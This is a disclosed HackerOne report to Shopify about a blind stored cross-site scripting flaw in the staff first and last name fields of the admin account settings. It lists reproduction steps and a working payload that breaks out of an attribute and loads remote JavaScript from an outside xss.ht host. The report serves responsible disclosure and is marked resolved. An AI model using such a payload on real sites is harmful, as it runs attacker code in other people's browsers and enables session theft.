Blind Stored XSS Via Staff Name

Disclosed: 2020-08-18 19:41:41 By rioncool22 To shopify

High

Vulnerability Details

Hey Team, I found blind stored XSS when i add staff name in https://your-store.myshopify.com/admin/settings/account Step to reproduce : 1. Go to https://your-store.myshopify.com/admin/settings/account 2. Add Staff Account 3. Fill First & Last Name with this payload "><script>$.getScript("//█████████.xss.ht")</script> 4. XSS will be fired in your internal web You should check the DOM.html guys ## Impact Stored XSS

Actions

View on HackerOne

Report Stats

Report ID: 948929
State: Closed
Substate: resolved
Upvotes: 38

Blind Stored XSS Via Staff Name

Vulnerability Details

Actions

Report Stats

Share this report